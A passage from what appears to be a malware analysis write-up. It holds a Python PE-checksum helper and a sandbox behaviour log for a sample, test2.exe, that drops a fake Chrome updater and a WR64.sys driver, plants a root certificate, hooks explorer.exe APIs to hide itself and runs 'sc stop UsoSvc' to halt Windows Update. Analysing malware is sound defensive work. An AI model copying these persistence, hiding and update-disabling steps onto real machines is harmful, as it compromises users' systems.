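    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x170, 0, 0, 0, 0, 0x60000020)
    body = bytes(range(256)) * 2                                 # constructed section bytes
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section + body


if __name__ == "__main__":
    img = build_minimal_pe32plus()
    print(f"real checksum: {stored_checksum(img):#x} should be: {pe_checksum(img):#x}")
    print("verifies after set_checksum:", verify(set_checksum(img)))
```

      For a dropped file, read it with open(path, "rb").read() and call verify; a mismatch alone does not prove malice (many legitimate builds ship with CheckSum 0, since the loader only enforces it for drivers and some system images), but a non-zero wrong value on a file that claims to be an updater is worth a closer look, and a .sys such as the dropped WR64.sys must verify or it will not load.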

      Persistence and Installation Behavior

      Source: C:\Windows\System32\lsass.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
      Source: C:\Program Files\Google\Chrome\updater.exe | File created: C:\Program Files\Google\Libs\WR64.sys
      Source: C:\Users\user\Desktop\test2.exe | File created: C:\Program Files\Google\Chrome\updater.exe
      Source: C:\Users\user\Desktop\test2.exe | File created: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp
      Source: C:\Program Files\Google\Chrome\updater.exe | File created: C:\Windows\Temp\kkldhmzqxige.tmp
      Source: C:\Windows\System32\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NcbService\NCBKapiNlmCache\6
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Users\user\Desktop\test2.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\KKLDHMZQXIGE.TMP
      Source: C:\Program Files\Google\Chrome\updater.exe | Module Loaded: C:\WINDOWS\TEMP\KKLDHMZQXIGE.TMP
      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 events)
Source: explorer.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9A 0xA3 0x32 0x2E 0xEF
      Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9908
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9887
Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 9744
Source: C:\Windows\System32\lsass.exe | Window / User API: threadDelayed 9748
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 9737
Source: C:\Windows\System32\dwm.exe | Window / User API: threadDelayed 9719
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 9744
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 9732
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 9734
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 9722
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 9614
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe | Window / User API: threadDelayed 9687
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 9682
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 2611
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 7376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9802
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 4431
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 5567
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 4671
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 5327
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe | Window / User API: threadDelayed 5367
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe | Window / User API: threadDelayed 4631
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe | Window / User API: threadDelayed 5604
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe | Window / User API: threadDelayed 4394
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 5485
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 4510
Source: C:\Windows\System32\dialer.exe | Window / User API: threadDelayed 4915
Source: C:\Windows\System32\dialer.exe | Window / User API: threadDelayed 1672
Source: C:\Windows\System32\dialer.exe | Window / User API: threadDelayed 3201
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9897
Source: C:\Users\user\Desktop\test2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp
Source: C:\Program Files\Google\Chrome\updater.exe | Dropped PE file which has not been started: C:\Windows\Temp\kkldhmzqxige.tmp
Source: C:\Program Files\Google\Chrome\updater.exe | Dropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584 | Thread sleep count: 9908 > 30
Source: C:\Windows\System32\dialer.exe TID: 2508 | Thread sleep count: 92 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292 | Thread sleep count: 9887 > 30
